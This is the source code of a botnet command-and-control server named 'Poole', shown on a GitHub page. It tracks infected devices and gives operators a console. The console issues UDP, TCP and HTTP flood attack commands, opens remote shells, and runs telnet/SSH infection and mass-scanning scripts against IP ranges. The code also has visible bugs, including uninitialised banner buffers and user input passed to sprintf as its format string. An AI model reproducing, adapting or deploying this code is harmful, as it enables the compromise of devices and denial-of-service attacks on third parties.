-
Notifications
You must be signed in to change notification settings - Fork 11
/
Copy pathPoole-server.c
694 lines (670 loc) · 24.6 KB
/
Poole-server.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
/*
|-----------------------------------------------------------------------|
_______ __
| \ | \
| $$$$$$$\ ______ ______ | $$ ______
| $$__/ $$ / \ / \ | $$ / \
| $$ $$| $$$$$$\| $$$$$$\| $$| $$$$$$\
| $$$$$$$ | $$ | $$| $$ | $$| $$| $$ $$
| $$ | $$__/ $$| $$__/ $$| $$| $$$$$$$$
| $$ \$$ $$ \$$ $$| $$ \$$ \
\$$ \$$$$$$ \$$$$$$ \$$ \$$$$$$$
[v1] "Poole"
|-----------------------------------------------------------------------|
__
/ _\ ___ _ ____ _____ _ __ ___
\ \ / _ \ '__\ \ / / _ \ '__| / __|
_\ \ __/ | \ V / __/ |_ | (__
\__/\___|_| \_/ \___|_(_) \___|
|-----------------------------------------------------------------------|
Screen execution: screen ./server [client-port] [threads] [server-port]
|-----------------------------------------------------------------------|
| Any problems or need help? message me via Twitter: |
| http://twitter.com/codingplanets |
|-----------------------------------------------------------------------|
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <inttypes.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <unistd.h>
#include <time.h>
#include <fcntl.h>
#include <sys/epoll.h>
#include <errno.h>
#include <pthread.h>
#include <signal.h>
#include <arpa/inet.h>
#define MAXFDS 1000000
//////////////////////////////////
struct login_info {
char username[20];
char password[20];
};
static struct login_info accounts[10];
struct clientdata_t {
uint32_t ip;
char connected;
} clients[MAXFDS];
struct telnetdata_t {
int connected;
} managements[MAXFDS];
struct args {
int sock;
struct sockaddr_in cli_addr;
};
static volatile FILE *telFD;
static volatile FILE *fileFD;
static volatile int epollFD = 0;
static volatile int listenFD = 0;
static volatile int OperatorsConnected = 0;
static volatile int TELFound = 0;
static volatile int scannerreport;
//////////////////////////////////
int fdgets(unsigned char *buffer, int bufferSize, int fd) {
int total = 0, got = 1;
while(got == 1 && total < bufferSize && *(buffer + total - 1) != '\n') { got = read(fd, buffer + total, 1); total++; }
return got;
}
void trim(char *str) {
int i;
int begin = 0;
int end = strlen(str) - 1;
while (isspace(str[begin])) begin++;
while ((end >= begin) && isspace(str[end])) end--;
for (i = begin; i <= end; i++) str[i - begin] = str[i];
str[i - begin] = '\0';
}
static int make_socket_non_blocking (int sfd) {
int flags, s;
flags = fcntl (sfd, F_GETFL, 0);
if (flags == -1) {
perror ("fcntl");
return -1;
}
flags |= O_NONBLOCK;
s = fcntl (sfd, F_SETFL, flags);
if (s == -1) {
perror ("fcntl");
return -1;
}
return 0;
}
static int create_and_bind (char *port) {
struct addrinfo hints;
struct addrinfo *result, *rp;
int s, sfd;
memset (&hints, 0, sizeof (struct addrinfo));
hints.ai_family = AF_UNSPEC; /* Return IPv4 and IPv6 choices */
hints.ai_socktype = SOCK_STREAM; /* We want a TCP socket */
hints.ai_flags = AI_PASSIVE; /* All interfaces */
s = getaddrinfo (NULL, port, &hints, &result);
if (s != 0) {
fprintf (stderr, "getaddrinfo: %s\n", gai_strerror (s));
return -1;
}
for (rp = result; rp != NULL; rp = rp->ai_next) {
sfd = socket (rp->ai_family, rp->ai_socktype, rp->ai_protocol);
if (sfd == -1) continue;
int yes = 1;
if ( setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1 ) perror("setsockopt");
s = bind (sfd, rp->ai_addr, rp->ai_addrlen);
if (s == 0) {
break;
}
close (sfd);
}
if (rp == NULL) {
fprintf (stderr, "Could not bind\n");
return -1;
}
freeaddrinfo (result);
return sfd;
}
void broadcast(char *msg, int us, char *sender)
{
int sendMGM = 1;
if(strcmp(msg, "PING") == 0) sendMGM = 0;
char *wot = malloc(strlen(msg) + 10);
memset(wot, 0, strlen(msg) + 10);
strcpy(wot, msg);
trim(wot);
time_t rawtime;
struct tm * timeinfo;
time(&rawtime);
timeinfo = localtime(&rawtime);
char *timestamp = asctime(timeinfo);
trim(timestamp);
int i;
for(i = 0; i < MAXFDS; i++)
{
if(i == us || (!clients[i].connected && (sendMGM == 0 || !managements[i].connected))) continue;
if(sendMGM && managements[i].connected)
{
send(i, "\x1b[33m", 5, MSG_NOSIGNAL);
send(i, sender, strlen(sender), MSG_NOSIGNAL);
send(i, ": ", 2, MSG_NOSIGNAL);
}
printf("sent to fd: %d\n", i);
send(i, msg, strlen(msg), MSG_NOSIGNAL);
if(sendMGM && managements[i].connected) send(i, "\r\n\x1b[31m> \x1b[0m", 13, MSG_NOSIGNAL);
else send(i, "\n", 1, MSG_NOSIGNAL);
}
free(wot);
}
void *BotEventLoop(void *useless) {
struct epoll_event event;
struct epoll_event *events;
int s;
events = calloc (MAXFDS, sizeof event);
while (1) {
int n, i;
n = epoll_wait (epollFD, events, MAXFDS, -1);
for (i = 0; i < n; i++) {
if ((events[i].events & EPOLLERR) || (events[i].events & EPOLLHUP) || (!(events[i].events & EPOLLIN))) {
clients[events[i].data.fd].connected = 0;
close(events[i].data.fd);
continue;
}
else if (listenFD == events[i].data.fd) {
while (1) {
struct sockaddr in_addr;
socklen_t in_len;
int infd, ipIndex;
in_len = sizeof in_addr;
infd = accept (listenFD, &in_addr, &in_len);
if (infd == -1) {
if ((errno == EAGAIN) || (errno == EWOULDBLOCK)) break;
else {
perror ("accept");
break;
}
}
clients[infd].ip = ((struct sockaddr_in *)&in_addr)->sin_addr.s_addr;
int dup = 0;
for(ipIndex = 0; ipIndex < MAXFDS; ipIndex++) {
if(!clients[ipIndex].connected || ipIndex == infd) continue;
if(clients[ipIndex].ip == clients[infd].ip) {
dup = 1;
break;
}}
if(dup) {
if(send(infd, "!* LOLNOGTFO\n", 13, MSG_NOSIGNAL) == -1) { close(infd); continue; }
close(infd);
continue;
}
s = make_socket_non_blocking (infd);
if (s == -1) { close(infd); break; }
event.data.fd = infd;
event.events = EPOLLIN | EPOLLET;
s = epoll_ctl (epollFD, EPOLL_CTL_ADD, infd, &event);
if (s == -1) {
perror ("epoll_ctl");
close(infd);
break;
}
clients[infd].connected = 1;
send(infd, "!* SCANNER ON\n", 14, MSG_NOSIGNAL);
}
continue;
}
else {
int datafd = events[i].data.fd;
struct clientdata_t *client = &(clients[datafd]);
int done = 0;
client->connected = 1;
while (1) {
ssize_t count;
char buf[2048];
memset(buf, 0, sizeof buf);
while(memset(buf, 0, sizeof buf) && (count = fdgets(buf, sizeof buf, datafd)) > 0) {
if(strstr(buf, "\n") == NULL) { done = 1; break; }
trim(buf);
if(strcmp(buf, "PING") == 0) {
if(send(datafd, "PONG\n", 5, MSG_NOSIGNAL) == -1) { done = 1; break; }
continue;
}
if(strstr(buf, "REPORT ") == buf) {
char *line = strstr(buf, "REPORT ") + 7;
fprintf(telFD, "%s\n", line);
fflush(telFD);
TELFound++;
continue;
}
if(strstr(buf, "PROBING") == buf) {
char *line = strstr(buf, "PROBING");
scannerreport = 1;
continue;
}
if(strstr(buf, "REMOVING PROBE") == buf) {
char *line = strstr(buf, "REMOVING PROBE");
scannerreport = 0;
continue;
}
if(strcmp(buf, "PONG") == 0) {
continue;
}
printf("buf: \"%s\"\n", buf);
}
if (count == -1) {
if (errno != EAGAIN) {
done = 1;
}
break;
}
else if (count == 0) {
done = 1;
break;
}
if (done) {
client->connected = 0;
close(datafd);
}}}}}}
unsigned int BotsConnected() {
int i = 0, total = 0;
for(i = 0; i < MAXFDS; i++) {
if(!clients[i].connected) continue;
total++;
}
return total;
}
void *TitleWriter(void *sock) {
int datafd = (int)sock;
char string[2048];
while(1) {
memset(string, 0, 2048);
sprintf(string, "%c]0;Slaves: %d| Masters: %d%c", '\033', BotsConnected(), OperatorsConnected, '\007');
if(send(datafd, string, strlen(string), MSG_NOSIGNAL) == -1) return;
sleep(2);
}}
int Find_Login(char *str) {
FILE *fp;
int line_num = 0;
int find_result = 0, find_line=0;
char temp[512];
if((fp = fopen("login.txt", "r")) == NULL){
return(-1);
}
while(fgets(temp, 512, fp) != NULL){
if((strstr(temp, str)) != NULL){
find_result++;
find_line = line_num;
}
line_num++;
}
if(fp)
fclose(fp);
if(find_result == 0)return 0;
return find_line;
}
void *BotWorker(void *sock) {
int datafd = (int)sock;
int find_line;
OperatorsConnected++;
pthread_t title;
char buf[2048];
char* username;
char* password;
memset(buf, 0, sizeof buf);
char botnet[2048];
memset(botnet, 0, 2048);
char botcount [2048];
memset(botcount, 0, 2048);
char statuscount [2048];
memset(statuscount, 0, 2048);
FILE *fp;
int i=0;
int c;
fp=fopen("login.txt", "r");
while(!feof(fp)) {
c=fgetc(fp);
++i;
}
int j=0;
rewind(fp);
while(j!=i-1) {
fscanf(fp, "%s %s", accounts[j].username, accounts[j].password);
++j;
}
if(send(datafd, "\x1b[30mUsername:\x1b[30m ", 22, MSG_NOSIGNAL) == -1) goto end;
if(fdgets(buf, sizeof buf, datafd) < 1) goto end;
trim(buf);
char* nickstring;
sprintf(accounts[find_line].username, buf);
nickstring = ("%s", buf);
find_line = Find_Login(nickstring);
if(strcmp(nickstring, accounts[find_line].username) == 0){
if(send(datafd, "\x1b[30mPassword:\x1b[30m ", 22, MSG_NOSIGNAL) == -1) goto end;
if(fdgets(buf, sizeof buf, datafd) < 1) goto end;
trim(buf);
if(strcmp(buf, accounts[find_line].password) != 0) goto failed;
memset(buf, 0, 2048);
goto Banner;
}
failed:
if(send(datafd, "\033[1A", 5, MSG_NOSIGNAL) == -1) goto end;
char failed_line1[80];
sprintf(failed_line1, "\x1b[31mWRONG ANSWER BITCH!!\r\n");
if(send(datafd, failed_line1, strlen(failed_line1), MSG_NOSIGNAL) == -1) goto end;
sleep(5);
goto end;
Banner:
pthread_create(&title, NULL, &TitleWriter, sock);
char ascii_banner_line1 [5000];
char ascii_banner_line2 [5000];
char ascii_banner_line3 [5000];
char ascii_banner_line4 [5000];
char ascii_banner_line5 [5000];
char ascii_banner_line6 [5000];
char ascii_banner_line7 [5000];
char welcome_line [80];
char banner_bot_count [2048];
memset(banner_bot_count, 0, 2048);
sprintf(ascii_banner_line7, "\x1b[31m _____ _ \r\n");
sprintf(ascii_banner_line7, "\x1b[31m | __ \ | | \r\n");
sprintf(ascii_banner_line7, "\x1b[31m | |__) |__ ___ | | ___ \r\n");
sprintf(ascii_banner_line7, "\x1b[31m | ___/ _ \ / _ \| |/ _ \\r\n");
sprintf(ascii_banner_line7, "\x1b[31m | | | (_) | (_) | | __/\r\n");
sprintf(ascii_banner_line7, "\x1b[31m |_| \___/ \___/|_|\___|\r\n");
sprintf(welcome_line, "\r\n\x1b[34m ~[\x1b[31mWelcome, %s\x1b[34m ]~\r\n", accounts[find_line].username);
sprintf(banner_bot_count, "\x1b[34m ~[\x1b[31mSlaves: %d\x1b[34m ]~\r\n", BotsConnected(), OperatorsConnected);
if(send(datafd, ascii_banner_line1, strlen(ascii_banner_line1), MSG_NOSIGNAL) == -1) goto end;
if(send(datafd, ascii_banner_line2, strlen(ascii_banner_line2), MSG_NOSIGNAL) == -1) goto end;
if(send(datafd, ascii_banner_line3, strlen(ascii_banner_line3), MSG_NOSIGNAL) == -1) goto end;
if(send(datafd, ascii_banner_line4, strlen(ascii_banner_line4), MSG_NOSIGNAL) == -1) goto end;
if(send(datafd, ascii_banner_line5, strlen(ascii_banner_line5), MSG_NOSIGNAL) == -1) goto end;
if(send(datafd, ascii_banner_line6, strlen(ascii_banner_line6), MSG_NOSIGNAL) == -1) goto end;
if(send(datafd, ascii_banner_line7, strlen(ascii_banner_line7), MSG_NOSIGNAL) == -1) goto end;
if(send(datafd, welcome_line, strlen(welcome_line), MSG_NOSIGNAL) == -1) goto end;
while(1) {
if(send(datafd, banner_bot_count, strlen(banner_bot_count), MSG_NOSIGNAL) == -1) goto end;
if(send(datafd, "\x1b[32m> \x1b[37m", 12, MSG_NOSIGNAL) == -1) goto end;
break;
}
pthread_create(&title, NULL, &TitleWriter, sock);
managements[datafd].connected = 1;
while(fdgets(buf, sizeof buf, datafd) > 0)
{
if(strstr(buf, "BOTS")) {
sprintf(botcount, "Slaves: %d | Masters: %d\r\n", BotsConnected(), OperatorsConnected);
if(send(datafd, botcount, strlen(botcount), MSG_NOSIGNAL) == -1) return;
continue;
}
if(strstr(buf, "STATUS")){
sprintf(statuscount, "TELNET DEVICES: %d | TELNET STATUS: %d\r\n", TELFound, scannerreport);
if(send(datafd, statuscount, strlen(statuscount), MSG_NOSIGNAL) == -1) return;
continue;
}
if(strstr(buf, "STATS")){
sprintf(botcount, "Slaves: %d | Masters: %d\r\n", BotsConnected(), OperatorsConnected);
if(send(datafd, botcount, strlen(botcount), MSG_NOSIGNAL) == -1) return;
sprintf(statuscount, "TELNET DEVICES: %d | TELNET STATUS: %d\r\n", TELFound, scannerreport);
if(send(datafd, statuscount, strlen(statuscount), MSG_NOSIGNAL) == -1) return;
continue;
}
if(strstr(buf, "INFECT")) {
system("python telnet.py filtered.txt");
continue;
}
if(strstr(buf, "REINFECT")) {
system("python w.py filtered_ssh.txt");
continue;
}
if(strstr(buf, "FILTER")) {
system("sort telnet.txt | uniq -u>>filtered_telnet.txt;sort infected.txt | uniq -u>>filtered_ssh.txt");
continue;
}
if(strstr(buf, "LOAD")) {
system("python scan.py 376 LOAD 88 1");
continue;
}
if(strstr(buf, "SCAN1")) {
system("python scan.py 376 B 119.92 lol");
continue;
}
if(strstr(buf, "SCAN2")) {
system("python scan.py 376 B 119.93 lol");
continue;
}
if(strstr(buf, "SCAN3")) {
system("python scan.py 376 B 125.25 1");
continue;
}
if(strstr(buf, "SCAN4")) {
system("python scan.py 376 B 125.26 1");
continue;
}
if(strstr(buf, "SCAN5")) {
system("python scan.py 376 B 125.27 1");
continue;
}
if(strstr(buf, "SCAN6")) {
system("python scan.py 376 B 113.53 1");
continue;
}
if(strstr(buf, "SCAN7")) {
system("python scan.py 376 B 180.180 1");
continue;
}
if(strstr(buf, "SCAN8")) {
system("python scan.py 376 B 185.52 1");
continue;
}
if(strstr(buf, "LUCKY")) {
system("python scan.py 376 LUCKY 88 1");
continue;
}
if(strstr(buf, "LUCKY2")) {
system("python scan.py 376 LUCKY2 88 1");
continue;
}
if(strstr(buf, "SCAN_OFF")) {
system("killall -9 python");
continue;
}
if(strstr(buf, "HELP")) {
pthread_create(&title, NULL, &TitleWriter, sock);
char helpline1 [80];
char helpline2 [80];
char helpline3 [80];
char helpline4 [80];
char helpline5 [80];
char helpline6 [80];
char helpline7 [80];
char helpline8 [80];
char helpline9 [80];
char helpline10 [80];
char helpline11 [80];
char helpline12 [80];
char helpline13 [80];
char helpline14 [80];
char helpline15 [80];
char helpline16 [80];
char helpline17 [80];
char helpline18 [80];
char helpline19 [80];
char helpline20 [80];
char helpline21 [80];
char helpline22 [80];
char helpline23 [80];
char helpline24 [80];
char helpline25 [80];
sprintf(helpline1, "\r\n\x1b[31m~[ATTACK COMMANDS]~\r\n");
sprintf(helpline2, "\x1b[31m~[\x1b[37mUDP\x1b[31m]~ \x1b[37m!* UDP Victim Port Time 32 0 10\r\n");
sprintf(helpline3, "\x1b[31m~[\x1b[37mTCP\x1b[31m]~ \x1b[37m!* TCP Victim Port Time 32 all 0 10\r\n");
sprintf(helpline4, "\x1b[31m~[\x1b[37mSTD\x1b[31m]~ \x1b[37m!* STD Victim Port Time\r\n");
sprintf(helpline5, "\x1b[31m~[\x1b[37mHTTP\x1b[31m]~ \x1b[37m!* HTTP Url Time\r\n");
sprintf(helpline6, "\x1b[31m~[\x1b[37mJUNK\x1b[31m]~ \x1b[37m!* JUNK Victim Port Time\r\n");
sprintf(helpline7, "\x1b[31m~[\x1b[37mHOLD\x1b[31m]~ \x1b[37m!* HOLD Victim Port Time\r\n");
sprintf(helpline8, "\x1b[31m~[\x1b[37mKILL\x1b[31m]~ \x1b[37m!* KILLATTK | KILL\r\n");
sprintf(helpline9, "\x1b[31m~[SCANNING COMMANDS]~\r\n");
sprintf(helpline10, "\x1b[31m~[\x1b[37mLOAD\x1b[31m]~ \x1b[37mLOAD\r\n");
sprintf(helpline11, "\x1b[31m~[\x1b[37mSCAN\x1b[31m]~ \x1b[37mSCAN1 | SCAN2 | SCAN3 | SCAN4\r\n");
sprintf(helpline12, "\x1b[31m~[\x1b[37mSCAN\x1b[31m]~ \x1b[37mSCAN5 | SCAN6 | SCAN7 | SCAN8\r\n");
sprintf(helpline13, "\x1b[31m~[\x1b[37mLUCKY\x1b[31m]~ \x1b[37mLUCKY | LUCKY2\r\n");
sprintf(helpline14, "\x1b[31m~[\x1b[37mSTOP\x1b[31m]~ \x1b[37mSCAN_OFF\r\n");
sprintf(helpline15, "\x1b[31m~[\x1b[37mGENERAL COMMANDS\x1b[31m]~\r\n");
sprintf(helpline16, "\x1b[31m~[\x1b[37mSHELL\x1b[31m]~ \x1b[37m!* SH\r\n");
sprintf(helpline17, "\x1b[31m~[\x1b[37mBOTS\x1b[31m]~ \x1b[37m!* BOTS | BOTS\r\n");
sprintf(helpline18, "\x1b[31m~[\x1b[37mSTATUS\x1b[31m]~ \x1b[37m!* STATUS | STATUS\r\n");
sprintf(helpline19, "\x1b[31m~[\x1b[37mSTATS\x1b[31m]~ \x1b[37mSTATS\r\n");
sprintf(helpline20, "\x1b[31m~[\x1b[37mMISC COMMANDS\x1b[31m]~\r\n");
sprintf(helpline21, "\x1b[31m~[\x1b[37mINECTION FILTER\x1b[31m]~ \x1b[37mFILTER\r\n");
sprintf(helpline22, "\x1b[31m~[\x1b[37mTELNET INFECT\x1b[31m]~ \x1b[37mINFECT\r\n");
sprintf(helpline23, "\x1b[31m~[\x1b[37mREINFECT BOTS\x1b[31m]~ \x1b[37mREINFECT\r\n");
sprintf(helpline24, "\x1b[31m~[\x1b[37mCLEARSCREEN\x1b[31m]~ \x1b[37mCLEAR\r\n");
sprintf(helpline25, "\x1b[31m~[\x1b[37mLOGOUT\x1b[31m]~ \x1b[37mLOGOUT\r\n");
if(send(datafd, helpline1, strlen(helpline1), MSG_NOSIGNAL) == -1) goto end;
if(send(datafd, helpline2, strlen(helpline2), MSG_NOSIGNAL) == -1) goto end;
if(send(datafd, helpline3, strlen(helpline3), MSG_NOSIGNAL) == -1) goto end;
if(send(datafd, helpline4, strlen(helpline4), MSG_NOSIGNAL) == -1) goto end;
if(send(datafd, helpline5, strlen(helpline5), MSG_NOSIGNAL) == -1) goto end;
if(send(datafd, helpline6, strlen(helpline6), MSG_NOSIGNAL) == -1) goto end;
if(send(datafd, helpline7, strlen(helpline7), MSG_NOSIGNAL) == -1) goto end;
if(send(datafd, helpline8, strlen(helpline8), MSG_NOSIGNAL) == -1) goto end;
if(send(datafd, helpline9, strlen(helpline9), MSG_NOSIGNAL) == -1) goto end;
if(send(datafd, helpline10, strlen(helpline10), MSG_NOSIGNAL) == -1) goto end;
if(send(datafd, helpline11, strlen(helpline11), MSG_NOSIGNAL) == -1) goto end;
if(send(datafd, helpline12, strlen(helpline12), MSG_NOSIGNAL) == -1) goto end;
if(send(datafd, helpline13, strlen(helpline13), MSG_NOSIGNAL) == -1) goto end;
if(send(datafd, helpline14, strlen(helpline14), MSG_NOSIGNAL) == -1) goto end;
if(send(datafd, helpline15, strlen(helpline15), MSG_NOSIGNAL) == -1) goto end;
if(send(datafd, helpline16, strlen(helpline16), MSG_NOSIGNAL) == -1) goto end;
if(send(datafd, helpline17, strlen(helpline17), MSG_NOSIGNAL) == -1) goto end;
if(send(datafd, helpline18, strlen(helpline18), MSG_NOSIGNAL) == -1) goto end;
if(send(datafd, helpline19, strlen(helpline19), MSG_NOSIGNAL) == -1) goto end;
if(send(datafd, helpline20, strlen(helpline20), MSG_NOSIGNAL) == -1) goto end;
if(send(datafd, helpline21, strlen(helpline21), MSG_NOSIGNAL) == -1) goto end;
if(send(datafd, helpline22, strlen(helpline22), MSG_NOSIGNAL) == -1) goto end;
if(send(datafd, helpline23, strlen(helpline23), MSG_NOSIGNAL) == -1) goto end;
if(send(datafd, helpline24, strlen(helpline24), MSG_NOSIGNAL) == -1) goto end;
if(send(datafd, helpline25, strlen(helpline25), MSG_NOSIGNAL) == -1) goto end;
pthread_create(&title, NULL, &TitleWriter, sock);
continue;
}
if(strstr(buf, "KILL")) {
char killattack [2048];
memset(killattack, 0, 2048);
sprintf(killattack, "!* KILLATTK\r\n");
if(send(datafd, killattack, strlen(killattack), MSG_NOSIGNAL) == -1) goto end;
continue;
}
if(strstr(buf, "CLEAR")) {
char clearscreen [2048];
memset(clearscreen, 0, 2048);
sprintf(clearscreen, "\033[2J\033[1;1H");
if(send(datafd, clearscreen, strlen(clearscreen), MSG_NOSIGNAL) == -1) goto end;
if(send(datafd, ascii_banner_line1, strlen(ascii_banner_line1), MSG_NOSIGNAL) == -1) goto end;
if(send(datafd, ascii_banner_line2, strlen(ascii_banner_line2), MSG_NOSIGNAL) == -1) goto end;
if(send(datafd, ascii_banner_line3, strlen(ascii_banner_line3), MSG_NOSIGNAL) == -1) goto end;
if(send(datafd, ascii_banner_line4, strlen(ascii_banner_line4), MSG_NOSIGNAL) == -1) goto end;
if(send(datafd, ascii_banner_line5, strlen(ascii_banner_line5), MSG_NOSIGNAL) == -1) goto end;
if(send(datafd, ascii_banner_line6, strlen(ascii_banner_line6), MSG_NOSIGNAL) == -1) goto end;
if(send(datafd, ascii_banner_line7, strlen(ascii_banner_line7), MSG_NOSIGNAL) == -1) goto end;
if(send(datafd, welcome_line, strlen(welcome_line), MSG_NOSIGNAL) == -1) goto end;
while(1) {
if(send(datafd, banner_bot_count, strlen(banner_bot_count), MSG_NOSIGNAL) == -1) goto end;
if(send(datafd, "\x1b[32m> \x1b[37m", 12, MSG_NOSIGNAL) == -1) goto end;
break;
}
continue;
}
if(strstr(buf, "LOGOUT")) {
char logoutmessage [2048];
memset(logoutmessage, 0, 2048);
sprintf(logoutmessage, "Bye, %s", accounts[find_line].username);
if(send(datafd, logoutmessage, strlen(logoutmessage), MSG_NOSIGNAL) == -1)goto end;
sleep(5);
goto end;
}
trim(buf);
if(send(datafd, "\x1b[31m> \x1b[0m", 11, MSG_NOSIGNAL) == -1) goto end;
if(strlen(buf) == 0) continue;
printf("%s: \"%s\"\n",accounts[find_line].username, buf);
FILE *LogFile;
LogFile = fopen("server_log.txt", "a");
time_t now;
struct tm *gmt;
char formatted_gmt [50];
char lcltime[50];
now = time(NULL);
gmt = gmtime(&now);
strftime ( formatted_gmt, sizeof(formatted_gmt), "%I:%M %p", gmt );
fprintf(LogFile, "[%s] %s: %s\n", formatted_gmt, accounts[find_line].username, buf);
fclose(LogFile);
broadcast(buf, datafd, accounts[find_line].username);
memset(buf, 0, 2048);
}
end:
managements[datafd].connected = 0;
close(datafd);
OperatorsConnected--;
}
void *BotListener(int port) {
int sockfd, newsockfd;
socklen_t clilen;
struct sockaddr_in serv_addr, cli_addr;
sockfd = socket(AF_INET, SOCK_STREAM, 0);
if (sockfd < 0) perror("ERROR opening socket");
bzero((char *) &serv_addr, sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr = INADDR_ANY;
serv_addr.sin_port = htons(port);
if (bind(sockfd, (struct sockaddr *) &serv_addr, sizeof(serv_addr)) < 0) perror("ERROR on binding");
listen(sockfd,5);
clilen = sizeof(cli_addr);
while(1) {
newsockfd = accept(sockfd, (struct sockaddr *) &cli_addr, &clilen);
if (newsockfd < 0) perror("ERROR on accept");
pthread_t thread;
pthread_create( &thread, NULL, &BotWorker, (void *)newsockfd);
}}
int main (int argc, char *argv[], void *sock)//~B1NARY~
{
signal(SIGPIPE, SIG_IGN);
int s, threads, port;
struct epoll_event event;
if (argc != 4) {
fprintf (stderr, "Usage: %s [port] [threads] [cnc-port]\n", argv[0]);
exit (EXIT_FAILURE);
}
port = atoi(argv[3]);
telFD = fopen("telnet.txt", "a+");
threads = atoi(argv[2]);
listenFD = create_and_bind (argv[1]);
if (listenFD == -1) abort ();
s = make_socket_non_blocking (listenFD);
if (s == -1) abort ();
s = listen (listenFD, SOMAXCONN);
if (s == -1) {
perror ("listen");
abort ();
}
epollFD = epoll_create1 (0);
if (epollFD == -1) {
perror ("epoll_create");
abort ();
}
event.data.fd = listenFD;
event.events = EPOLLIN | EPOLLET;
s = epoll_ctl (epollFD, EPOLL_CTL_ADD, listenFD, &event);
if (s == -1) {
perror ("epoll_ctl");
abort ();
}
pthread_t thread[threads + 2];
while(threads--) {
pthread_create( &thread[threads + 1], NULL, &BotEventLoop, (void *) NULL);
}
pthread_create(&thread[0], NULL, &BotListener, port);
while(1) {
broadcast("PING", -1, "LEL");
sleep(60);
}
close (listenFD);
return EXIT_SUCCESS;
}